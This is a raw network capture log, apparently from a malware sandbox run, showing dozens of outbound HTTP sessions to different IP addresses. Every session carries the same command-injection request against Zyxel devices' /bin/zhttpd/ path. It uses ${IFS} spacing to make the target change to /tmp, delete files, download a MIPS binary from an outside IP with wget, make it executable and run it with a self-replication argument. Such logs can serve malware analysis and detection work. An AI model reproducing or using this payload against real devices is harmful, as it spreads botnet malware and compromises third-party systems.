                                                      Feb 2, 2024 06:35:52.614339113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4365192.168.2.1452948211.61.150.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614365101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4366192.168.2.144512449.122.17.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614428043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4367192.168.2.1437744217.170.13.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614463091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4368192.168.2.1447984190.34.211.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614490986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4369192.168.2.1435080194.220.233.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614541054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4370192.168.2.145865217.29.192.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614573956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4371192.168.2.1453916129.120.5.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614610910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4372192.168.2.144491650.238.126.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614677906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4373192.168.2.1438964146.122.38.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614706039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4374192.168.2.1435854211.131.220.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614744902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4375192.168.2.1447682197.111.51.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614789963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4376192.168.2.1441008114.26.101.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614811897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4377192.168.2.1459668158.75.38.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614850998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4378192.168.2.145259225.199.139.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614902973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4379192.168.2.1450344167.229.88.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614933014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4380192.168.2.1440640165.89.45.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614983082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4381192.168.2.1452164129.240.6.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615005016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4382192.168.2.1452372205.235.29.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615051985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4383192.168.2.1457378180.233.1.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615103006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4384192.168.2.1450946174.212.118.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615139008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4385192.168.2.143838062.64.126.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615195036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4386192.168.2.1453494198.60.66.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615247011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4387192.168.2.1441036117.107.211.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615271091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4388192.168.2.1456768182.68.212.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615324020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4389192.168.2.146040491.47.21.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615376949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4390192.168.2.145311043.63.171.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615417004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4391192.168.2.1434950141.56.143.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615458012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4392192.168.2.1455142144.2.163.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615487099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4393192.168.2.1449586135.44.69.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615531921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4394192.168.2.145561831.34.99.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615572929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4395192.168.2.1441260102.161.62.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615612030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4396192.168.2.1439274210.213.149.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615644932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4397192.168.2.143689692.209.145.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615689993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4398192.168.2.1440266116.30.131.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615716934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4399192.168.2.1457554213.34.122.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615752935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4400192.168.2.1445446121.146.31.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615784883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4401192.168.2.1433902199.60.212.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615813971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4402192.168.2.1454988142.34.195.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615865946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4403192.168.2.1446742168.229.210.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615926981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4404192.168.2.144743083.227.238.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.615957975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4405192.168.2.1449450164.185.122.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.616009951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4406192.168.2.143605285.210.242.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.616041899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4407192.168.2.1433382132.84.208.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.616089106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4408192.168.2.1438626149.72.182.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.616148949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4409192.168.2.1437568149.88.40.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.616166115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4410192.168.2.1454996181.166.145.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.616223097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4411192.168.2.1434596129.183.158.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.616275072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4412192.168.2.1439356161.150.198.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.616316080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4413192.168.2.1440848123.24.225.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.616359949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4414192.168.2.145143478.66.45.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.616390944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4415192.168.2.144599041.198.84.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.616437912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4416192.168.2.145091847.187.245.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.620287895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4417192.168.2.1438576125.153.217.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.620326042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4418192.168.2.1441324150.166.19.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.620348930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4419192.168.2.145664294.92.255.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.620379925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4420192.168.2.1440610123.22.212.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.620434046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4421192.168.2.1451358184.108.84.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.620471954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4422192.168.2.143933237.179.76.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.620507002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4423192.168.2.1444068113.185.58.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.620538950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4424192.168.2.143592094.188.38.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.620595932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4425192.168.2.1458234205.230.239.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.620632887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4426192.168.2.1439804159.169.21.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.620647907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4427192.168.2.1450688104.17.198.298080
                                                      TimestampBytes transferredDirectionData
